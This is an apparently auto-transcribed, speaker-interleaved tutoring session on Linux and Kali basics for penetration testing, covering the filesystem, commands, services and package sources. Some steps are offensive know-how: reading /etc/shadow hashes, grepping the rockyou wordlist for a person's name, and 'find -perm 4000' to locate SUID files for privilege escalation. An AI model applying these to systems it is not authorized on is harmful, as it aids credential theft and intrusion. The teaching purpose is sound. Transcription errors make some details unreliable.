We'll be starting with the distribution of the Linux. When we talk
Mhm.
about the Linux-based operating system, we'll be first talking about the file architecture
Okay.
of Linux. But before that, why Linux?
Mhm.
Okay, why Linux? When we talk about the Linux-based operating system for pen testing, it is considered to be the more powerful operating system. Second thing, everything is organized in a Linux operating system. Plus, Linux treats everything as a file. Okay, due to these reasons, we usually go for Linux as the pen testing operating system. We can use Windows, but Windows haven't got that much power in it for performing the pen testing or for performing any kind of activities like that. Linux is, on the other hand, is one of the most powerful operating system. But when we talk about Linux, what we usually do is we consider Linux as an operating system. So Linux is not an operating system; it's a kernel. Okay,
Mhm.
on which your operating system is built. Okay,
Okay.
we have got different flavors of Linux. Okay, different flavor of Linux as in, like you can say, we have got Red Hat, we have got
Ubuntu.
Fedora, yes. We have got Ubuntu. We have got
Kali.
Cent OS, and we have got Kali Linux. Okay, we'll be using Kali Linux for performing the pen testing.
Okay.
We'll be using our Kali Linux for pen testing. Now, the thing is, when we talk about Kali Linux, why we specifically go for Kali Linux? You can feel free to go for any other Linux as well. You could use Ubuntu, you could use Fedora, you could use Red Hat, you could use Cent OS, you could use Black Linux. But the thing is, when we talk about the Kali Linux, it got pre-installed tools, it got pre-installed libraries, so we don't need to spend our time in downloading and configuring. So they have got pre-installed and pre-configured tools and libraries in it. Now, when we talk about the Linux-based operating system, they have got their architecture, like the one we have got in Microsoft operating system or Microsoft Windows. In Windows, usually by default, you will be having a C drive. Okay, in
Mhm.
that C drive, you will be having users, you will be having Windows, you will be having yes, program files, you will be
Program
having
files. Program.
program files x86.
Mhm.
Okay, I'll just move this Windows to the very end because we might be requiring it. Okay, in Windows folder, we have got one folder named as System 32.
32.
Okay, and wow, sys 64, which contains the other system files. In System 32, we have got another what do you call, other subdirectories. We have got uh, config in it, which contains a file named as SAM file, which is security account manager. Okay,
I
like
don't
we
know.
have got different. Yes,
What is this box 64? Is it there in Windows 11? I don't see it.
it's present in every Linux based operating system. Let me show you. When we talk about Windows,
Mhm.
here we are. We got wow, system.
Oh, system
Sorry, sys was
164.
64. Yeah, sorry,
Yeah,
sorry.
that's okay.
Wow, we have got system
Ignorant
32.
about this folder.
Okay. Then we have got in our config folder inside we have got SAM file security account manager. Likewise, for every of the operating system, you will be having throughout the same architectures here. In users, you will be finding different users' home location. Okay. Same
Yes.
way in Linux operating system, we will be having the architecture. Okay. In Linux, we will be having something known
Mhm.
as the root directory,
Mhm.
annotated by this thing. It is named as root
Good.
directory. Then inside root directory, we have got so many folders. Like we have got bin,
Then
we have got etc, we have got
documents.
dev, we have got yes, home folder, we have
Home.
got sometimes root folders, we have got boot folder, then we have got sbin folder, we have got usr folder, we have got this thing tmp folder, we have got opt folder, we have got uh, like a variable we done variable folder, we have got proc folder, and soon you will be having the folders accordingly inside them. Now for each and every kind of folder we have got their functionality defined. Like let's say here we have got so many folders here which have got their own functionality
Mhm.
divided among themselves. Same way we have got the functionalities inside your linux based operating system. Now the architecture I am talking here about is completely similar for every other Linux flavored operating system, and sometimes you can find the same in your Unix based operating system as well. So not
Mhm.
sometimes, like almost most of the time you will find it the same. So the very first folder is your bin folder. Okay. So the very first folder is my bin folder. Just a second.
Mhm.
Okay. Bin stands for binary. Okay. On the same hand, I will try to cop up with the visualization of the this thing of the Linux folder so that it might be easy for you to understand. So we have got Ali.
So I have a question when it's loading. I saw that we can
Yes, sir.
customize Kali by installing all that. So when we go for OSCP exam, can we use our own customized or all the updated version of Kali, or we have to download the image then and there, then itself and use it?
No, you can customize your own Kali. You could use your own Kali.
Okay. So the one that I practiced, if everything is updated and everything, I take a backup and keep it ready for the exam.
Yes,
Okay.
it's recommended that you keep at least 2 to 3 backups of Kali.
Okay.
So okay, yes, just starting. Okay. Meanwhile, it is starting. Let me go with it. Bin. It's known as binary.
Mhm.
It contains essential user command binary. Okay, essential user command binaries, as in it will be containing all the binary files, all the commands which you can execute in the terminal. So it's never like you will be you want to clear your screen, you will just type clear and Kali will understand. No,
Yeah.
there is a whole command named as clear whose coding has already been done. You type usually ls for listing. So
Yes.
that is something which has been coded here. So let me keep you with the this one. So, sudo su cd space slash. Now I am inside my root directory inside the parent directory, which is the folder,
Mhm.
or which can be said the father of all directories here. ls, the very first folder is your bin. If you will enter here cd space bin, do a ls, you will be able to see all the executable commands.
Mhm.
You will be able to see all the executable commands here. Let's say I want to see the command, let's say ls space. Okay, yes. So if you want to see the command, let's say ls or any command, let's say clear. So you need to search it here, which is already present here. cd, uh, okay, c is here. Here it is, clear. That's the
Mhm.
whole command. Now, when we talk about the list, we have got ls. You will also find the same command, that is your cd command, which is
Mhm.
actually used for navigating inside some directories. For opening the files, we usually use our cat commands. For reading the content, we use the cat command. The same way you could use. If you want to open the file, let's say I want to go for cat space cat over here, it will be displaying data in your binary format. That's in an executable format. Like
Mhm.
we have got our exe files here in the Microsoft operating system. We have got this binary format files over there. Okay. Then cd space dot dot. We next folder we have got is the boot folder. Okay. When we talk about the boot folder, it contains the static files for the bootloader. Okay. So let's just cd space boot. Sorry, cd space boot ls. So these are the files which are required by my virtualization to open, or these are the files which are required by my bootloader for loading the files.
Mhm.
Then next we have got
Similar to
is
BIOS in
dev.
Windows.
Come again, sir?
Similar to BIOS in Windows for the starter.
Yes. When your BIOS loads, your system will load, the grub will be loaded. So it will be
Yes.
fetching the files from for your Windows loader, operating system loader, boot loader. It will using this file. Then we have got the dev. Dev stands for devices. Okay. Here, when we talk about the dev folder,
Drivers, everything.
not exactly the drivers. You can find files here like slash dev slash null file. Basically,
Mhm.
this folder includes the terminal devices.
Okay.
Okay, like terminal devices, like your USB is there, your hard disk drive is there, which attached to the system. Is attached to the system, or which is attached to your operating system as of now. Now, what you will be able to find here is you will be finding some device, let's say cd space dev. You'll be able to find devices starting with the name sda. Sda means your hard drive which is connected as of now. So you can do an ls. You will find it here, your sda1. So these are the two drives or two areas where we need to check out, or where we need, which means like these are our hard drive files which are currently present over there. Then we have got our one of the special folder, that is your etc. In English we called etc as etc, but here we call the configuration folder. Okay, you will find all the configuration file. in this folder. What kind of configuration files? You can find the password file which contains the information about all the different users. Okay, what information? Their home location, their cell location. Then we have got the shadow file. Shadow will contains the hashed credentials for users. Just like we have got SAM file in Windows. Okay, you'll be having this file has shadow file. Okay, apart from it, most of the files you will be seeing like .cfg, .conf. You will be find config extension for all the files over here. So let me show you that one as well. cd space etc ls. Can you see like d conf conf cfg and conf. You will be finding all of the information here, and here you will be finding the files named as your shadow file and your password file. Here it is the shadow file. Okay, cat shadow, and you will be seeing the encrypted password or hash credential of your Kali Linux or Kali user. Same way, if you will scroll down for the root as well, you will be able to see. Then you have got the password file. Here you will get the information about all the different users, their user IDs, their home location, and their terminal location, which is present inside. Whenever you are launching the terminal, it will be telling you from where your terminal has been originated.
Okay.
Then after that, we will be having your home folder. It is just like your Windows user folder, users folder. Okay, which will be containing information all about all the users account. Okay, like if you will open your C drive users and Windows
Mm.
folder, let me show you here as well. Let's say your C drive, your yes. Okay. Then for the visualization, let's say CD home. Right now, I have got only one user named as Kali. If you will open it,
Mm.
it will show you the whole like desktop documents, downloads, and other informations, which is quite present over there. Okay. Then we have got our LIB folder. LIB folder contains your shared libraries which can be used by operating system or any application, any application. So that's what we have our lib folder, so which will be containing all different libraries. Let's just see the space lib list. These are different libraries which we will be using or our system will be using it. Then apart from this library folder, we have got the media folder. Okay, media folder contains all the removable devices. Okay, like your CDs, floppy disk, and other kind of removable devices. We have got OPT. It's known as optional, what we usually call it. It's an add-on application software package location. Add-on soft, it's add-on application package location. So you can see here if you want to download and install any kind of additional software, so you could use your opt file and folders. Okay. So here in this location to install some kind of application. I want to download and install from our GitHub. So I will be downloading and installing it in this specific folder. Though it's your choice to perform the installation at some other location, feel free. But usually people use this for installing some other application or softwares which are not present inside the file. Then we have got the SBIN. It's known as system binaries. Okay, system binaries means you need root permission to exit. Plus, they will be interacting with the software and hardware. Okay, they will be interacting with the software and hardware. Like hardware, as in you will be finding your commands like iwconfig, which will be interacting with the hardware which is used. So let's say cd space sbin ls. So you will be, let's say you want to do some disk parts, or you need to do some kind of partition. So this folder will be containing your command. So let me show you here. The defrag is there. Disk part might be also there. Then we have got IW, yeah, IW config, which will give you the information about your interfaces. What are the interfaces there? So it will be used, or it will be containing all the information via which you can contain or interact with the hardware itself. Then after your SBIN, you using your TMP. Okay, it's something we call temporary. Okay, and its work is again for the temporary files. Okay, temporary files. So if you are going for execution of some kind of application after breaching, most of the people refer to do things in TMP because there is no permission required as such. Okay, you can have your writing permission, you could have your execution permission inside this folder while we solve some kind of box and machines and kind of CPS. Then we have got the VAR folder. It's known as the variable folder. Okay, when we talk about the variable folder, it contains all those files whose size keeps on increasing. Okay, just like your log files, your web hosting files, or even your mailing files or mail server files. Okay, so it's something like your logs will always keep on increasing, they are not going to decrease. Okay, your you will still will be hosting a mailing server, you will be getting mails, and you will be always on a verge of increasing mails rather than on decreasing mails. Let's go for cd space var. You will be able to see the files here. So here we have got the log file. You can go for cd space log. It will tell you about all the logs. Even if you want to host something in your Kali Linux, you will be using cd space triple w inside your var. Okay, so inside that you will be having again HTML, and here you will be hosting some kind of application just to access into it. Okay, so same way you could directly use this your var folder for finding the or for hosting any sort of information. Then we have got the proc folder. Proc is known as process folder. It contains all the processes. Okay, it contains all the processes over here. And proc folder is you will be mostly most of the time seeing numbers over there. Linux says it's good with me that I can assign names or I can work with the name of the processes, but there are so many processes I cannot name all of them. So what I will do is I will provide you with the numbers. Okay, I'll provide you with the numbers over here. So what Linux does is whenever it starts a process, it will start with the number or any picking the random number for the process, and it will be delivering you the process in the form of numbers as well as names here. Now let's say I don't have my Apache services running as of now. Okay, let me show you ps AUX, and I can go for grep Apache. There is this auto color Apache, but there is no service of Apache running. You can check it out. Service Apache 2 status. It says it is disabled. Okay. And if running my service, let's say service Apache 2 start. So it will be starting with a process. So if you will check out the status, it says it is already running over here and with the process ID as in 9990 and 9973. But if you will see here, you won't find 9973 or 9990. But if you will refresh it or list it again, you will be able to see uh, 9990. Okay, and 9974 is there somewhere. You will also find 9973 again if you will be killing it. Okay, let me show you the process ID, that is 9990 and 9973. ls grep 9973 on 990. So it says it is there, but as soon as you will kill it or you will stop it, it will end. And now if you will search, so as soon as you will be starting a new process, it will be coming there, occurring here in the form of a number as a process ID or PPID, parent process ID or main process ID. Last but not the least, we have got the USR folder. Now it's a very interesting folder for us. It contains user utilities and applications. Okay, let's say I want to perform a brute force attack. For that, I dictionary attack. For that, I need to have a word list with us. Okay, so I will be finding all those word lists inside my USR folder. So let me go for cd space slash USR, list it, go for cd space share, list it, and you will be having a folder named as your word lists over here. Cd space word lists listed, and these are all the word lists which are present. Okay, so here are all the word lists which are present over here, and you could use it. Let's say we have got your name. We have got your name is Mr. Ramesh. Okay, so I can search your name inside this word list over here. Let's go for cat space rocky.txt grep Ramesh, and you will be able to see all the words which contain the word characters RAME as such. So these can be used. Moreover, you will be also able to see the files of Nmap. Okay, the tool which you will be using, or you will be able to see files of Metasploit framework, which further in the sessions we will be using here. So it contains all the user utilities and applications which are present inside your operating system by default. Got it, sir?
Yes.
Now we have been talking about our Linux operating system. Okay, we are talking about the architecture of the Linux operating system. Here we have got uh, plus more few things over here. Few things as in like we can Linux usually comes with some kind of architecture, sorry, some kind of processes which are not already enabled. Okay, so there are certain processes which we need to turn them on for getting started. But before we started, as soon as you will be booting up into your Kali Linux, okay, you need to confirmly change your credentials for the security reasons. So we as a pen tester, we do it on the habitual basis to change the credentials of your by default user Kali. So for that, you can directly give PASSWD Kali, which means we are asking to change the password for the Kali Linux and enter the new password, and then you need to confirm new password. Okay, so that's the very best practice after getting access of your uh, Linux system. You just need to go for PASSWD, give Kali, and then go in with your new credentials over there. Okay, so now that's up to you. So I guess you are having Kali Linux with you.
Yeah, but I wanted
Per-
to, because I have made some updates and other things, so I may start with a new one because still the
No
thing is
worries.
still, yeah,
No,
I
no,
have
no worries
something.
at all, sir. Mhm. No, no worries. That's fine. That's fine. That's fine. Okay. Now, when we are talking about the Linux, so you need to confirm as which user you are. So I will be using my normal user as of now most of the time. So I just need to check out who am I. It says the Kali, and I will even check my UID, that is 1000. That's as of Kali. Okay. Now, if I want to elevate or I want to use my other, that is my super user, I will directly go for sudo space who am I. Enter the credential there and it will tell you you are working as a root system. Okay. Now, Kali Linux has got its own menu. If you will click on this Kali's logo over here, it's just like your Windows button, or which is like your Windows key or icon here. Like you usually use this icon there to open the menu. So here we have got the Kali Linux menu. You'll be able to see more or less kind of applications or tools. Like you'll be able to see the usual applications, the information gathering tool, the VA tools, the web application analysis, the database assessment tools, password attacking tools, your wireless attacks, you will be attacking tools, the reverse engineering tools, you will be having the exploitation tools, you will be able to see sniffing and spoofing tools, post exploitation tools. So it contains a vast variety of tools inside your Kali Linux. Okay, now for finding some list of tools, you can always refer to Kali Linux official documentation. Uh, so you could refer to Kali Linux or Kali Docs or Kali Linux Docs. If you have a question, feel free to type in there this installation or the virtualization you will be having. Kali Net Hunter you will be able to see. Okay, with the whole Kali's blog over here, and you will be able to check it out. But I guess you won't be needing that much of the Kali's help page. But in case, feel free to navigate here because in case of commands, you might be requiring some kind of help because there are so many switches or parameters which are passed while using certain commands. Let's say even if I want to perform the listing, like even if I want to perform the listing, I will go for ls. With that, I can also go with hyphen l. I can go with hyphen a. I can also go with hyphen uh, A1. Okay, I can go with ls space hyphen la1. So it will start giving me information about these different kind of switches which I am using, like hyphen l hyphen a. And people are sometimes not aware about what are these information all about, or how we can find it. Either you could refer to the online documentation, but for me the best thing is the man pages. Okay, when we talk about the man pages, these are the manual pages for the Linux commands. These are the manual pages for Linux commands. How? You can directly go with exclamation hash man, and then you can give the command over there. So it will give you the whole manual library of it. While reading, you will be able to find out, okay, these are the switches or parameters you can actually use with your Linux command. So let me show you. Let's say I want to find the listing of your, sorry, manual page of ls. It will tell you ls means list directory contents. Synopsis is you can provide ls and other option. Description is list information about files. Sort entries alphabetically if none of the information is provided. With hyphen a, you will be specifying do not ignore file entries starting with a dot, which means in Linux, your hidden files will be starting with a dot. Okay, in Linux, if you want to see the hidden files, they will be starting with a dot. And with hyphen small a, you will be specifying all, and with hyphen capital A, you will be saying almost all, but I don't want any hidden files. So let me show you. If I am going for hyphen cap small a, can you see so many files are there which are just starting with dot, or folders which are starting with dot?
Mm-hmm.
So these dot means these are the hidden files and folders. Like in Windows, we have got some hidden files and folders. In Linux also, we got some hidden files and folders, and those names are starting with just a dot. Okay. Let's say if I'm going to provide hyphen capital A, which means it will show me all the information, but not the exactly every hidden file is there. You will be seeing. But if you will be using hyphen small a, it will show you all the hidden files and folders which is quite present over there in your Linux operating system. But yes. Okay. So you can just navigate to your ls command for finding all different information, like how you can actually execute the commands and what are different parameters which are present over there. Earlier in Linux operating system, you can also search the description about the command. Let's say man space hyphen k password. Okay, password nothing appropriate. Okay. Earlier you will be able to see some information. PSSWDS. Okay. Earlier, it would give you some information about like the information about the keyword which I am searching. Let's say if I'm gonna go for ls, okay, it would have given me the whole listing, like all the commands which contain the word ls. But anyways, they have got changed. The things got changed over the Linux operating system as well. So instead, you can use this thing if I want to search any keyword containing the word password inside it and ends with a dollar, which means like it's a whole regex, a regular expression. Okay, so they have removed this apropos for this specific information. So they have changed this whole information and they are not displaying it. So earlier, what you used to do, you are not remembering any command. So you require the functionality of it, and that functionality it contains a word and you are searching for that word, so it will give you the list of commands and the information description about that specific command. With this one, okay, and you say like I remember a command in which there are three characters like are like wrd, so you will be typing in this manner for finding, let it be inside the key terms or let it be inside your this terms, your word terms or the description terms, it will give you. You can also open the man space man, the manual page of the man. See, they specified hyphen K for apropos as well as the regular expression. But I don't know what happened to it. They stopped working in the 2023 version. Sorry, after 2022's version, they actually stopped working with
Okay.
it. You can also check about the apropos space partition again. So they have stopped working. They have stopped performing this propose. Anyways, coming back to our topic, you can also list all the files with the simple ls command, so it will give you this. Now, when we talk about the color coding in all of the Linux based operating system, okay, color coding in when we talk about the Linux based operating system will tell you quite a good information upon listing. So it can be pretty much quick for understanding. When you will be getting some blue color, it means it is a directory or it is a simple folder over here. Sorry, it is a simple folder over there. Then if you will be seeing the green color means these are the executable files, like the one we see in bin and sbin folder. Then in red color, we will be having some compressed files and folders. Okay. If we'll be seeing anything inside your red color, it means it's a compressed file and folder. Then if you are seeing the cyan color, that is CYAN color, it means these are the symbolic links. Okay, which means application is at some other location and you are having that at some other location, but you are still able to find it or execute it from any other location. Then we have got yellow color says device files. Okay, these colors are the one which we see inside dev folder. Okay, then we have got the magenta color specifies some like some kind of audio, some kind of video, some kind of pixel related files. Then, at last but not the least, we have got the white. It actually means the regular files. Okay, it actually means the regular files. So it's a color coding. So you will be going for color and then with it some description. So you will be able to understand now the color coding. See, check out. We have got a little magenta or pink or purple kind. It's a your this kind of file, your image file. We have got the white color. It will be our simply file. It contains the text in it or some kind of data. Blue color means these are certain folder. Let's say we go for cd space slash dev listed. Can you see yellow color files? Yellow color
Yes.
name. So it means these are the device information or device names in it. If we go for cd space slash bin do a listing, you will be able to see some green color files, which means they are the executable files over here. Okay, so that's the simplest of the color coding. Well, when you will be working, you will be able to grab this whole information. Let's say if I am going CD and I am giving the permission for executing to this crack py. So you can directly go for ls space hyphen la. You can check the hash crack py for its information, and it will be delivering you that who is the user, who is the parent user of it, or which group it belongs to, when it was created, what's the size of it, and what are the permissions which are provided. So it doesn't have any executable permission. So you will be providing it with chmod plus x your hash pi. So it says operation not permitted because only a root or parent user can change the permission. So I will go for sudo space chmod plus 7, sorry, plus X for executable permission to hash file. If you will do ls space hyphen LA, sorry, your hash crack, can you see the color of the file got changed and it got the executable permission as well?
Mhm.
Okay, so that's how you will be grabbing the information about your files with the help of some color coding. You can directly navigate to some from one folder to another folder or via commands. Just a sec. Sudo chmod. I don't want to give it the permission. I want to revoke it. I will use mine. Okay, moving around in Linux is pretty much necessary. Let's say you find out you have got these files and folders. You want to go into the download folder. So you'll be using cd space downloads, enter, and you will be entering. Remember this thing, Linux is a case sensitive operating system, which means the capital A and the small a means two different things for your Linux operating system. Okay,
Okay.
it's not, it won't be the same thing. They will be completely different thing for your Linux, that is your capital A and small a, because it is a case sensitive programming. Okay, now you can navigate it. Now there are two things you need to keep in mind in case of Linux. Whenever you will be seeing this tilde symbol, it means the home location. Okay, it means the home location. And wherever you will be seeing this at the again, so it means the root folder or root uh, inside root. Okay, you can say inside root you are. Okay, same way you can navigate here and there in Linux with the help of this thing. Let's say I want to go to directly to the home. Either you could press CD, you will be see. Can you see this thing? You're
Mhm.
directly at your home. For confirming, you could use your PWD, that is your command, which will tell you the present working directory. Okay, it will directory. So, and again, if you will go for CD space tilde, it means you are inside your navigating to home of the user. Then, if you will be entering here, CD space slash etc slash ettercap. So you will be inside a folder named as ettercap inside your etc folder, which is again in root folder. Okay, you can use it in this manner, or you could, if you directly want to jump to the root, so you can use cd space slash. It will directly navigate you to the navigate you towards the root folder. Okay, so it will be navigating you. Now if you directly want to go back to the previous location where you were, so you could use cd space minus. It will navigate you to the previous location, navigate you to the previous location. Okay, let me show you this thing. Let's say pwd, I am inside my home director of sorry, home directory of Kali Linux. Let's say cd space slash I'm at this location. Let's go for pwd. It will show me at the complete blank directory. So I can navigate myself to cd space slash etc ettercaf. Enter pwd. Though the whole location it will be displayed here after your username and the first name. Hit enter. It will show you slash etc slash Iter cap. Now I definitely want to jump to my home directory, so I will go for cd space tilde, hit enter. Now I will again check I am inside my home directory. But I know just the previously I entered uh, some specific location, that is slash etc slash iter cap. So what I can go for is cd space minus enter, and you will be able to see you are back to the same location where you previously were. Okay, so that's how you can navigate inside your Kali Linux. Got it, sir?
Yes.
Now, once we are done with this Kali Linux, we need to check out with what kind of how you can actually create some directories. Or before directories, let's say, okay, I won't burden you much, so I will stop it here as of today. About the in the next session, we'll be starting with the Okay, so in the previous session, we looked about how different commands actually work and how you can use these commands.
Mhm.
Okay, now there are certain commands, I guess, which are you are pretty much aware of. Aware of as in, let's say we are aware of how we can create directories. Let me start my Kali Linux as well.
Sorry, you're
Like
breaking.
how I think let me start my Kali Linux. I guess you might be aware about how you can create different files and different folders in Kali Linux, or in
Yes.
simply the Linux, how you can create the different folders, different directories. But there is a little difference in it. Like you might know just a single command via which you can create directories. But there are commands which can be used for creating multiple directories at once.
Mhm.
So we'll be starting with that with it today. It's pretty much simple. Okay,
Okay.
it's very simple to go in that case. So let it get start. So what we usually do is for creating some kind of directories, we use let's say mkdir
Mhm.
directory name.
Yes. Make a directory.
Okay. So when we are giving or when we are specifying the nomenclature of initializing a name to a
Mhm.
directory, we always make sure that directory name doesn't contain any kind of space in it. Okay. Let's say if I want to create a directory, start it. If I want to create a directory, I will go in this manner, that is mkdir space single directory name. Or
Mhm.
you can also go in this manner mkdir. Let's say I want to create a directory with the name of hacker1. Okay, it will just create a small directory for me with the name of hacker1 in it. Okay, now let me show you the same thing. Okay. Okay. So let's say if I do ls, I want to there is a there are different directories. But let's say I want to create a directory with the name of hacker1. So I will go for cd sorry mk dir space hacker1 here. So here it is the directory. Now let's navigate into hacker1. Enter ls. It is completely empty. Okay. Now what if I want to create a folder in which there comes a space in it. Okay, let's say I want to create a folder having a space or having like two names in it, with separated by a space. So I usually people think is that going for creating a directory is simply like mk dir space hacker1 will do the work for me. But no, it won't do the work for you. What it's going to do is, let me show you.
Create a directory for that.
dir hacker1. Okay. If we will do a ls, sorry, not cd, mkdir hacker one. If you will do ls, it will create two different folder. Let's say hyphen l. It will create two different folder. One with the name of hacker and second with the name of one. Okay, it will here create two different directories, one with the name of hacker and second one with the name of one. So it is not the correct syntax for us to go for in this sense. So what we do is we create the directory in this manner, and the name of the directory should be enclosed inside double inverted commas. Okay. Now, if I will do a simple ls, so can you see there are three folders, two
Yes.
with a single name and one with two different names separated by a space.
Single quotation.
Let's say I want to create some more folder, or I want to create a folder and folder, let's say folder number two. Okay, let's say I want to create folder with the name of two, two, and inside I want to create three different folder named as alpha, beta, gamma within
Yes.
one command. So what I can go for is there is a very simple but very beautiful command for doing so, and the command says you simply mkdir. I would specify hyphen p that my parent folder is two. And inside that, I want to create three different folders, alpha, comma, beta, comma, gamma. Hit enter. Now you will see ls, there is this folder named as 2, cd space 2, and list it. You will see three different folders here named as alpha, beta, and gamma. Okay,
Okay.
let me put it there, which will generate a total of four folders, one as the parent folder and second one as the other three as the inner folder inside it. So it will create a parent directory alpha, 2, and inside it will create three different folders, that is alpha, beta, and gamma. So folder creation is pretty much easy in Linux, because it is kind of same when we do it for our Microsoft operating system. Okay. Now let's say I want to find files in Linux. Okay. Find files or finding in Linux. We have got three different sub commands which can be used for doing our work. Okay. But before that, let me tell you, like when you will be doing simply echo dollar path. It will just print all the location or default locations from where you can fetch out or your commands are going to execute. Let's say echo dollar path. So it will tell you what are the default searching location or what are the default locations from where you can search files and folder inside your Linux. Now, sometimes we need to update our database. Okay, sometimes we need to update our database for the location or for creating the links for the location our Linux will be able to search in for. So for that I will go for simply update db. What it's going to do is it's going to update the Linux database, and from there I can directly use my all the files. And we need to do it on the regular basis, like once in a while we can or we need to perform this updation so that our Linux is completely updated in case of searching files and folder inside our Linux operating system. So let's go for update db. So it's gonna take few seconds time, like hardly 5 to 10 seconds, for updating the files and folders location here. Okay, it will usually take 10 to 15 seconds, but it's taking a little longer. And yes,
Like
let it
why
be.
that why the dollar path is displaying so many paths for this user? These are all the directories set for that user.
Yes, let me tell you. Copy. So when I entered this path, this one that is dollar path, it gave me this as the output. So what
Yes.
does this mean? Let's separate it on the basis of columns. Okay, it says like these at these locations you will be able to find the commands. So these commands, and it's something like you will be able to execute anything from anywhere. So you can say it's a global variable kind of stuff. Like we've
Okay.
got one the environment variable that is
Yes.
you can execute a command from anywhere. So it's going to search commands at these locations.
Okay. So it's like
Okay,
setting
so
a Windows environment variable here.
yes, so basically when we will be finding something in Linux, so the it goes to the directives that are obtained inside our dollar path. Okay, it will be searching each and every directory and variable inside these specific paths. The variable contains a listing of directories that Kali searches or even our Linux searches when a command is issued without its path.
Okay.
Okay. Now, for finding the path in finding Linux, you first can go use the which command. Okay. In simple terms, you can directly execute or issue which space name. Let's say SBD. Sorry, SBD. Sorry, SBD. So I guess it's something there. Which SBD, hit enter, and it will tell you the specific directory. Okay, which results in a full path to the file as it is here. Okay, so which will tell you the directory where it is. Then the second is locate. Okay, second command is locate. Let's say locate sbd.exe, or you can also go for locate peter.conf. Okay, let's say locate sbd.exe. So it's going to tell you at this location. Then you can also go for the another one, peter.conf. It will tell you the location of peter.conf here. Okay. Then we have got the most difficult one here, which is our find. Okay. With find, we have got a specific syntax. Okay. The command says find. Okay. Root location to find. Root location for finding. Then you will specify hyphen like types. Types as in you can specify names, you can specify extension, you can specify the size, you can type finding. Okay, you can specify the any attribute here, and then you can specify the name to find. Okay, let's say I want to find from my root directory hyphen name sbd.exe. Okay, or sbd asterisk. Anything with its name, it will be finding. So I can directly go with find space from root directory hyphen name sbd anything. So it will be helping in finding all the at all the possible locations where our system is, or to where from where like anything we can find it with the help of this thing. Most of the time we use this command, the this tool utility tool, for finding the weak permission files. Like for performing privilege escalations, we will be using this specific command. So let me show you the implementation of it as well. uh, google.com find hyphen find hyphen perm 4000 something. Okay, displays files only with permission set to 4000. Okay, so I could use this command for finding, let's say find hyphen perm to 4000. Okay, basically we will also deploy it with some sort of information. Here it is, information as in slash dev slash null for sending our error messages to a specific file. It says permission denied for accessing this thing, then no such file or directory is there, some other thing and some other thing. So we can use for finding the files having weak permissions in it. Weak permissions as in like while performing privilege escalation, we usually go for finding any specific file having some leaked permission or some kind of different permission. So you can give it different modes. You could give it all different kind of attributes. Okay, like mode slash mode and plus mode. So these are different attributes which can be used. Let me show you privilege escalation. Mhm. Domain assume. Yeah, I guess it was for finding the SUIDs. See, check out, find hyphen bin name namo something with this thing. So it will be asking for finding the file, exploiting the files as pseudo users. So we will be using this kind of tools or this kind of utilities. But as of now, it can be used. It's one of the most complex tool a person could use in Linux for finding each and every sort of information here. Then again, in Kali Linux or in Linux, there are permissions. There are different kind of services. Okay, which doesn't comes enabled by default. So there are different ways for enabling the services. So first one is enabling services. Let's say you want to enable the SSH. Okay, SSH is something which is by default coming into our Kali Linux. So let me show you. Uh, Service SSH status. So it says it is disabled as of now, which means it is inactive. Okay, let's say I want to start a service or sorry, start a service, not enabling. Start a service. Okay, so for that there are two different commands. First command is service SSH start, or the second one you can actually use is systemctl start Apache 2. Okay, so I will be showing you two different ways for enabling and disabling the service. Let's say service SSH start. Okay, it will start. Then again, if I want to check out my Apache 2 service, I will go for system CTL start Apache 2. It will say the system has started this kind of service. Okay, now I want to check the status of different services. Status of different services. Okay, for that you can directly go here and type service SSH status, or even you could go for system CTL status Apache 2. Okay, so in these manner you can check out, let's say service SSH status. It says it is active and running. Then we can go for system CTL
And I still say
status.
that it is disabled. Why is that?
Come again, sir.
It still shows as disabled.
Disable.
I'm
Okay.
not.
See, here disable and enable means two things. Okay. Whenever it says enabled,
Mhm.
enable means application or service is attached as startup service,
Okay.
and disable means service is not attached as startup
So,
service. Okay. Then if I want to what you call stop the services, stop services, you could use again system sorry service up SSH to stop,
stop.
and system CTL stop Apache 2. So let me show you. Uh, Stop. Okay. And on the same time, let me show you the status of SSH. Can you see? It has been inactive. Same way, I can go with the stop of Apache 2. And then let me show you the status of Apache 2. It is stop. Now, when it comes to enable, okay, when it comes to enable, what we can go for is we can go for enabling service as startup. Okay, for that you can go for system CTL enable SSH. Okay, and for disabling we can go for sorry disabling service at startup. We can directly go with system CTL disable SSH. So let me show you. Let me system CTL start Apache 2. Then let's make it enable Apache 2. Okay. Now, if I'm going to see the status of it, can you see it's enable?
Yes.
Okay. Now, if you will just execute the command, let's say reboot or init 6, it will restart, and as soon as it will start, your service here will automatically get started. Let me show you the command, that is the status. Systemctl status Apache 2. Can you see it is already running and it is enabled?
Mhm.
Okay. Now let me disable it, and if you will check it now, it says it is now disabled, and you can directly stop the service Apache 2 stop, and you can check out the status now. Okay, it says it is disabled. So that's how you can actually check out the services and manage any kind of services in Kali Linux. But we need to have the name of the package or name of the service we want to enable or disable it. Then we can go for some searching, updating, installing, and removing tools in Kali Linux. Okay, so we have got a repository file here. Okay, we have a repository file for updates and installation, and the file name is sources.list, and its specific location is /etc/apt/sources.list. Okay, now if you will just execute the command for finding or for checking it out, nano, this thing, it will show you something like this. Let's say nano/etc/apt sources list. It will show you something like this, but it will be with a little change here. Okay, so it will thing like this, and it will be having a little change here. So it will be having hash over here, and what you need to do is you need to remove the hash from the last line. Remove the hash from the last line. If we are including the hash means it is a comment and it's not going to get executed. So whenever you will be checking
Yeah.
out, you will be having hash space something like this. Okay. Now I want to update my Kali Linux. I that this hash, this specific lines hash, the fourth lines hash is removed. Save it, exit it, and you can directly go with update. What it's going to do is it's going to update the Kali Linux repository. Okay, it says no public key available, so that could create some problem. Let me show you. Kali Linux public key not available. So we need to issue a small public key. Hmm, Here it is. Okay, that's a small key. If you seen this thing that you're having a public key error, then in that execute this command for signing it with any kind of public key for which it can download the repository. Okay, so you can find almost the same command every time, everywhere where you will be seeing, or you could go for this command as well. So both of the commands are going to work perfectly fine for finding out the public key. So here it is for repositories. Okay, so you can execute any of those commands. So I guess wget update archive linux, yes. So you could use any of those commands for finding the repository or sending it with the this command. Okay, so I usually go for this one because there is a public key, and not only this, Kali's repository, it will be using Ubuntu's repository as well. Check out, the repository is not signed, so you can directly execute this thing, and you can now up your system. Okay, there is again the issue which says so transition before. Okay, so we can go with this one. Error not found. So its repositories links, I guess, keeps on
Yeah,
changing.
I think
So
all those steps needs to be there. Download, install.
